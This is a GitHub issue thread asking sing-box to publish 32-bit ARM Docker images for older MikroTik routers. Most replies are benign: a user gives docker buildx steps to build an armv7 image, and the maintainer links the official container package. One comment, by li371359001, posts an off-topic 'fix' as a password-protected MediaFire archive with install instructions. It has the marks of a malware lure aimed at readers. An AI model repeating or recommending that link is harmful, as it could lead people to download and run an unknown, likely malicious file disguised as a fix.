### ISSUE TITLE
Docker container ARM 32bit support

### ISSUE THREAD

**Issue by wetfloo** [SagerNet/sing-box#2071]
Hi, would it be possible to add 32-bit support for a docker container workflow? It seems as simple as just adding an architecture to the workflow file. This would, for example, allow for running sing-box containerized on older mikrotik routers

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MemesPwr** [comment]
I have builded docker image by myself for my **hAP ac3** which is running on **7.16rc4** at this moment:

1. Clone this repo (i am do this to `~/src`, but it's don't really matter)  
  `$ git clone --recurse-submodules https://github.com/SagerNet/sing-box.git`
1. Navigate to repo directory  
   `$ cd sing-box/`
1. Build an image using docker  
  `$ docker buildx build -t sing-box-armv7 --no-cache --platform linux/arm/v7 .`
1. Export our image to .tar archive  
  `$ docker save sing-box-armv7 -o singbox-armv7-img.tar`

then just upload it to your router. i have uploaded directly to my usd which is mounted on my router and use our `singbox-armv7-img.tar` file instead remote image

it should looks like this in winbox:
![winbox64_2024-09-04_14-52-37](https://github.com/user-attachments/assets/8e346403-8aa9-4c36-be1e-d5c8e9b62cc6)
![image](https://github.com/user-attachments/assets/a665732f-225b-40dc-8c10-56905baddb3d)

you also need to set [mount point](https://sing-box.sagernet.org/installation/docker/#compose:~:text=%5C%0A%20%20%2Dv-,/etc/sing%2Dbox%3A/etc/sing%2Dbox/,-%5C%0A%20%20%2D%2Dname%3D) ("Mounts" property on screenshot above)

hope this can help you to run sing-box on your mikrotik

**Comment by nekohasekai** [comment]
https://github.com/SagerNet/sing-box/pkgs/container/sing-box
